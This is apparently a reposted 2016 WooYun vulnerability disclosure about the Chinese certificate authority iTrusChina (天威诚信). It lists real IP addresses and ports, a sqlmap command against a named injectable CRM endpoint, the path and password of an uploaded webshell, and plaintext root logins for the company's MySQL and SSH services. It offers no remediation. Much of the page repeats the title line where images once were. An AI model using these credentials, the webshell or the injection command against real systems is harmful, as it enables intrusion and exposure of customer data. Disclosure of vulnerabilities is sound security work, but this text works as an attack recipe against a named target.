神刀安全网

漏洞标题: 天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞详情

披露状态:

2016-01-26: 细节已通知厂商并且等待厂商处理中
2016-01-26: 厂商已经确认,细节仅向厂商公开
2016-02-05: 细节向核心白帽子及相关领域专家公开
2016-02-15: 细节向普通白帽子公开
2016-02-25: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

做证书的!影响内网好多网段。涉及大量客户的秘钥、key什么的

详细说明:

PING mail.topca.cn (124.205.224.179)

PING mail.itrus.com.cn (124.205.224.178)

同一个ip映射内网不同业务不同ip

1.crm的SQL注入

用友的这个系统十几处sql注入,这系统废了,放内网吧

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

python sqlmap.py -u "http://124.205.224.179:9036/background/recievesms.php?ID=1*" –dbs –current-user –current-db –is-dba

就不一一列举了,全是注入点

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

2.上传漏洞,至少3处,直接getshell

shell地址:http://topca.cn:9036//tmpfile/cmd.php

密码:c

http://wooyun.org/bugs/wooyun-2015-0137503

http://wooyun.org/bugs/wooyun-2015-0136925

WooYun: 用友CRM系统任意文件上传getshell(附众多案例)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

crm就这样沦陷了,上面都是内部运营的信息,虽然zend加密php,可逆,再去连数据库就可以了

注:同一个ip这个shell环境是windows+sqlserver,内网ip独立192段

漏洞证明:

3.mysql外网可连,涉及至少18W的企业用户数据

mysql://124.205.224.179:9019

root/password

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

4.ssh外链&弱口令

ssh://124.205.224.179:9021

root/123123

ssh://124.205.224.179:9027

user/password

内网指向不同ip

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

漏洞标题:  天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

又是一组数据库,还能本地连

修复方案:

到此结束,好多问题,做安全证书,然而安全却…

版权声明:转载请注明来源 路淫甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 天威诚信多个系统漏洞导致多个内网设备Getshell(涉及18W+企业用户信息/内部敏感信息/可漫游)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮